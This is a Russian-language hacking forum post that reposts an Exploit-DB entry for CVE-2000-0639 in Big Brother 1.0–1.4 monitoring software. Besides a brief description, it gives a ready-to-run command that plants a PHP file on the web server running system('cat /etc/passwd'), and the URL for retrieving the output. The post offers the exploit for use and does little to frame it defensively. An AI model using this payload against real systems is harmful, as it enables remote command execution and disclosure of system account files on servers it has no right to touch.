Exploit Sean MacGuire Big Brother 1.0/1.3/1.4 - CGI File Creation

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20092
Проверка EDB
  1. Пройдено
Автор
XTERNAL
Тип уязвимости
LOCAL
Платформа
CGI
CVE
cve-2000-0639
Дата публикации
2001-06-11
Код: 
source: https://www.securityfocus.com/bid/1494/info

A vulnerability in Big Brother exists which would allow a user to remotely create CGI scripts which could be requested from the Web Server. These could be used to read files and possibly execute commands on the web server machine. 

./bb 1.2.3.4 "status evil.php3 <?<system(\"cat /etc/passwd\");?>"

will allow viewing of the /etc/passwd upon browsing to http://1.2.3.4/bb/logs/evil.php3.
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Sean MacGuire Big Brother 1.x - Directory Traversal
Ответы
0
Просмотры
286
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit BB4 Big Brother Network Monitor 1.5 d2 - 'bb-hist.sh?HISTFILE' File Existence Disclosure
Ответы
0
Просмотры
293
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу